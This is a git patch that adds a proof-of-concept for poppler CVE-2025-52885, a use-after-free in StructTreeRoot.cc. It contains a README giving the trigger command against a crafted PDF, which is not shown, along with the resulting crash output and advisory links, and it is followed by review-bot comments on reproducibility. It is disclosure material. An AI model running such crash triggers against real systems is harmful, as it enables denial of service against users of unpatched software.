From 13560528e5f4ac6617c771fb9d60837645144ce0 Mon Sep 17 00:00:00 2001 From: Kevin Backhouse Date: Tue, 14 Oct 2025 13:00:28 +0100 Subject: [PATCH] Proof of concept for poppler CVE-2025-52885 --- .../poppler-CVE-2025-52885/README.md | 28 ++++++++++++++++++ .../poppler-CVE-2025-52885/bug.pdf | Bin 0 -> 8987 bytes 2 files changed, 28 insertions(+) create mode 100644 SecurityExploits/freedesktop/poppler-CVE-2025-52885/README.md create mode 100644 SecurityExploits/freedesktop/poppler-CVE-2025-52885/bug.pdf diff --git a/SecurityExploits/freedesktop/poppler-CVE-2025-52885/README.md b/SecurityExploits/freedesktop/poppler-CVE-2025-52885/README.md new file mode 100644 index 0000000..859f7b6 --- /dev/null +++ b/SecurityExploits/freedesktop/poppler-CVE-2025-52885/README.md @@ -0,0 +1,28 @@ +# Proof of concept for poppler CVE-2025-52885 + +CVE-2025-52885 is a use-after-free vulnerability in +[poppler](https://gitlab.freedesktop.org/poppler). The bug is in +[StructTreeRoot.cc](https://gitlab.freedesktop.org/poppler/poppler/-/blob/2a3135888b6079f0a9fd6410ff65351482087b50/poppler/StructTreeRoot.cc). As +far as we know, this code is only used when one of poppler's command +line tools is run with a non-default command line option, so the +vulnerability does not affect the most common uses of poppler. + +This directory contains a poc which triggers the bug. To run it: + +```bash +pdfinfo -struct bug.pdf +``` + +In our testing, this causes `pdfinfo` to crash with the following error message: + +``` +free(): invalid next size (fast) +Aborted +``` + +## Links: + +* https://gitlab.freedesktop.org/poppler/poppler/-/issues/1580 +* https://gitlab.freedesktop.org/poppler/poppler/-/merge_requests/1884 +* https://securitylab.github.com/advisories/GHSL-2025-042_poppler/ +* https://www.openwall.com/lists/oss-security/2025/10/13/2 
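Review bot: the README does not record which poppler version or commit the PoC was reproduced against, nor the version that carries the fix, so a reader cannot tell from this file whether their build is affected; add a line such as "Tested against poppler <commit or version>; fixed in <version>" (placeholders to be filled in) next to the `pdfinfo -struct bug.pdf` instructions, since the StructTreeRoot.cc link pins a source commit but not a tested release. The quoted crash, `free(): invalid next size (fast)`, is glibc's heap-consistency abort and does not by itself show a use-after-free; consider also quoting the AddressSanitizer report for the same run, whose `heap-use-after-free` error and free/use stacks (which per the first paragraph should land in StructTreeRoot.cc) make the classification verifiable. Minor: `## Links:` should drop the trailing colon, and "a poc which" reads better as "a PoC that".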
diff --git a/SecurityExploits/freedesktop/poppler-CVE-2025-52885/bug.pdf b/SecurityExploits/freedesktop/poppler-CVE-2025-52885/bug.pdf new file mode 100644 index 0000000000000000000000000000000000000000..57b7c92aa4442c21aa570ab0de190ba2f4aa0827 GIT binary patch literal 8987
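Review bot: bug.pdf is added as an opaque 8987-byte binary with no note on how it was produced, so a reviewer cannot confirm it is a minimal trigger for the StructTreeRoot.cc path the README describes rather than a larger file with incidental content; add a sentence to the README (or the commit message) on how the file was generated or minimized, or check in the generator script next to the PDF so the artifact can be regenerated and reviewed as text.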